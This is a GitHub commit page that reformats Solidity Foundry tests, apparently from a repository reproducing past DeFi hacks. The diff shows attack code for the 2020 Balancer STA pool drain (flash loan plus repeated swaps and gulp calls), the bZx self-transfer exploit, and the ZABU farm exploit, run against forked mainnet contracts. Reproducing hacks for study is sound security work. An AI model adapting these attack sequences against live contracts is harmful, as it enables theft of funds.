Skip to content

Commit

Permalink
chore(src): forge fmt
Browse files Browse the repository at this point in the history 
Signed-off-by: jsvisa <[email protected]>
  • Loading branch information
@jsvisa
jsvisa committed Nov 4, 2024
1 parent 94f40a1 commit 2bed06c
Show file tree
Hide file tree
Showing 32 changed files with 442 additions and 660 deletions.
141 changes: 44 additions & 97 deletions src/test/2020-06/Balancer_20200628_exp.sol
View file
Original file line number Diff line number Diff line change
Expand Up @@ -29,12 +29,12 @@ struct AccountInfo {

interface IUniswapV2Router02 {
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
uint256 deadline
) external returns (uint256[] memory amounts);
}

library Actions {
Expand All @@ -48,6 +48,7 @@ library Actions {
Liquidate, // liquidate an undercollateralized or expiring account
Vaporize, // use excess tokens to zero-out a completely negative account
Call // send arbitrary data to an address

}

struct ActionArgs {
Expand All @@ -66,11 +67,13 @@ library Types {
enum AssetDenomination {
Wei, // the amount is denominated in wei
Par // the amount is denominated in par

}

enum AssetReference {
Delta, // the amount is given as a delta from the current value
Target // the amount is given as an exact number to end up at

}

struct AssetAmount {
Expand All @@ -82,31 +85,32 @@ library Types {
}

interface ISoloMargin {
function operate(
AccountInfo[] memory accounts,
Actions.ActionArgs[] memory actions
) external;
function operate(AccountInfo[] memory accounts, Actions.ActionArgs[] memory actions) external;
}

interface BPool {
function swapExactAmountIn(
address tokenIn,
uint tokenAmountIn,
uint256 tokenAmountIn,
address tokenOut,
uint minAmountOut,
uint maxPrice
) external returns (uint tokenAmountOut, uint spotPriceAfter);
uint256 minAmountOut,
uint256 maxPrice
) external returns (uint256 tokenAmountOut, uint256 spotPriceAfter);

function gulp(address token) external;
function gulp(
address token
) external;

function getBalance(address token) external view returns (uint);
function getBalance(
address token
) external view returns (uint256);

function swapExactAmountOut(
address tokenIn,
uint maxAmountIn,
uint256 maxAmountIn,
address tokenOut,
uint tokenAmountOut,
uint maxPrice
uint256 tokenAmountOut,
uint256 maxPrice
) external;
}

Expand All @@ -116,8 +120,8 @@ contract BalancerExp is Test {
address sta = 0xa7DE087329BFcda5639247F96140f9DAbe3DeED1;
BPool bpool = BPool(0x0e511Aa1a137AaD267dfe3a6bFCa0b856C1a3682);
address pancakeV2Router = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
uint public constant BONE = 10 ** 18;
uint public constant MAX_IN_RATIO = BONE / 2;
uint256 public constant BONE = 10 ** 18;
uint256 public constant MAX_IN_RATIO = BONE / 2;

function setUp() public {
vm.createSelectFork("mainnet", 10_355_806);
Expand All @@ -131,36 +135,28 @@ contract BalancerExp is Test {
IERC20(sta).approve(pancakeV2Router, type(uint256).max);

emit log_named_decimal_uint(
"[Before Attack] Attacker WETH Balance : ",
(IERC20(weth).balanceOf(address(this))),
18
"[Before Attack] Attacker WETH Balance : ", (IERC20(weth).balanceOf(address(this))), 18
);
emit log_named_decimal_uint(
"[Before Attack] Attacker STA Balance : ",
(IERC20(sta).balanceOf(address(this))),
18
"[Before Attack] Attacker STA Balance : ", (IERC20(sta).balanceOf(address(this))), 18
);

// attack
attack();

// check profit
emit log_named_decimal_uint(
"[After Attack] Attacker WETH Balance : ",
(IERC20(weth).balanceOf(address(this))),
18
"[After Attack] Attacker WETH Balance : ", (IERC20(weth).balanceOf(address(this))), 18
);
emit log_named_decimal_uint(
"[After Attack] Attacker STA Balance : ",
(IERC20(sta).balanceOf(address(this))),
18
"[After Attack] Attacker STA Balance : ", (IERC20(sta).balanceOf(address(this))), 18
);
}

function bmul(uint a, uint b) internal pure returns (uint) {
uint c0 = a * b;
uint c1 = c0 + (BONE / 2);
uint c2 = c1 / BONE;
function bmul(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c0 = a * b;
uint256 c1 = c0 + (BONE / 2);
uint256 c2 = c1 / BONE;
return c2;
}

Expand All @@ -174,7 +170,7 @@ contract BalancerExp is Test {

Actions.ActionArgs[] memory actions = new Actions.ActionArgs[](3);
{
uint wethAmount = IERC20(weth).balanceOf(dydx);
uint256 wethAmount = IERC20(weth).balanceOf(dydx);
actions[0].actionType = Actions.ActionType.Withdraw;
actions[0].amount.value = wethAmount;
actions[0].otherAddress = address(this);
Expand All @@ -198,83 +194,34 @@ contract BalancerExp is Test {
) external {
// swap weth to sta
bpool.gulp(weth);
uint MaxinRatio = bmul(bpool.getBalance(weth), MAX_IN_RATIO);
uint256 MaxinRatio = bmul(bpool.getBalance(weth), MAX_IN_RATIO);
bpool.swapExactAmountIn(weth, MaxinRatio - 1e18, sta, 0, 9999 * 1e18);
bpool.swapExactAmountIn(
sta,
IERC20(sta).balanceOf(address(this)),
weth,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(sta, IERC20(sta).balanceOf(address(this)), weth, 0, 9999 * 1e18);
MaxinRatio = bmul(bpool.getBalance(weth), MAX_IN_RATIO);
bpool.swapExactAmountIn(
weth,
(MaxinRatio * 50) / 100,
sta,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(
sta,
IERC20(sta).balanceOf(address(this)),
weth,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(weth, (MaxinRatio * 50) / 100, sta, 0, 9999 * 1e18);
bpool.swapExactAmountIn(sta, IERC20(sta).balanceOf(address(this)), weth, 0, 9999 * 1e18);
MaxinRatio = bmul(bpool.getBalance(weth), MAX_IN_RATIO);
bpool.swapExactAmountIn(
weth,
(MaxinRatio * 25) / 100,
sta,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(
sta,
IERC20(sta).balanceOf(address(this)),
weth,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(weth, (MaxinRatio * 25) / 100, sta, 0, 9999 * 1e18);
bpool.swapExactAmountIn(sta, IERC20(sta).balanceOf(address(this)), weth, 0, 9999 * 1e18);

for (uint i = 0; i < 16; i++) {
for (uint256 i = 0; i < 16; i++) {
MaxinRatio = bmul(bpool.getBalance(weth), MAX_IN_RATIO);
if ((i + 1) < 9) {
bpool.swapExactAmountIn(
weth,
(MaxinRatio * (i + 1) * 10) / 100,
sta,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(weth, (MaxinRatio * (i + 1) * 10) / 100, sta, 0, 9999 * 1e18);
} else {
bpool.swapExactAmountIn(
weth,
(MaxinRatio * 95) / 100,
sta,
0,
9999 * 1e18
);
bpool.swapExactAmountIn(weth, (MaxinRatio * 95) / 100, sta, 0, 9999 * 1e18);
}
}

require(
IERC20(sta).balanceOf(address(this)) > 0,
"swap weth to sta failed"
);
require(IERC20(sta).balanceOf(address(this)) > 0, "swap weth to sta failed");

bpool.swapExactAmountOut(
weth,
99999999999 * 1e18,
sta,
IERC20(sta).balanceOf(address(bpool)) - 1,
99999 * 1e18
weth, 99_999_999_999 * 1e18, sta, IERC20(sta).balanceOf(address(bpool)) - 1, 99_999 * 1e18
);
bpool.gulp(sta);

// swap sta to weth
for (uint j = 0; j < 20; j++) {
for (uint256 j = 0; j < 20; j++) {
MaxinRatio = bmul(bpool.getBalance(sta), MAX_IN_RATIO);
bpool.swapExactAmountIn(sta, 1, weth, 0, 9999 * 1e18);
bpool.gulp(sta);
Expand Down
5 changes: 3 additions & 2 deletions src/test/2020-09/bzx_exp.sol
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@ pragma solidity ^0.8.15;
import "../basetest.sol";
import "./../interface.sol";

// @KeyInfo - Total Lost :
// @KeyInfo - Total Lost :
// Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7
// Vulnerable Contract : https://etherscan.io/address/0xb983e01458529665007ff7e0cddecdb74b967eb6
// Attack Tx : https://etherscan.io/tx/0x85dc2a433fd9eaadaf56fd8156c956da23fc17e5ef83955c7e2c4c37efa20bb5
Expand All @@ -21,6 +21,7 @@ contract bzx is BaseTestWithBalanceLog {
uint256 blocknumToForkFrom = 10_852_716 - 1;

ILoanTokenLogicWeth constant loanToken = ILoanTokenLogicWeth(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6);

function setUp() public {
vm.createSelectFork("mainnet", blocknumToForkFrom);
//Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
Expand All @@ -33,7 +34,7 @@ contract bzx is BaseTestWithBalanceLog {
loanToken.mintWithEther{value: 200 ether}(address(this));

// transfer token to myself repeatedly
for(int i = 0; i < 4; i++){
for (int256 i = 0; i < 4; i++) {
uint256 balance = loanToken.balanceOf(address(this));
loanToken.transfer(address(this), balance);
}
Expand Down
8 changes: 6 additions & 2 deletions src/test/2021-09/ZABU_exp.sol
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,9 @@ import "./../interface.sol";
interface ZABUFarm {
function deposit(uint256 _pid, uint256 _amount) external;
function withdraw(uint256 _pid, uint256 _amount) external;
function emergencyWithdraw(uint256 _pid) external;
function emergencyWithdraw(
uint256 _pid
) external;
}

interface PangolinRouter {
Expand Down Expand Up @@ -156,7 +158,9 @@ contract ContractTest is Test {
addressContract = _add;
}

function buyPNG(uint256 amount) public {
function buyPNG(
uint256 amount
) public {
address[] memory path = new address[](2);
path[0] = address(WAVAX);
path[1] = address(PNG);
Expand Down
Loading

0 comments on commit 2bed06c

Please sign in to comment.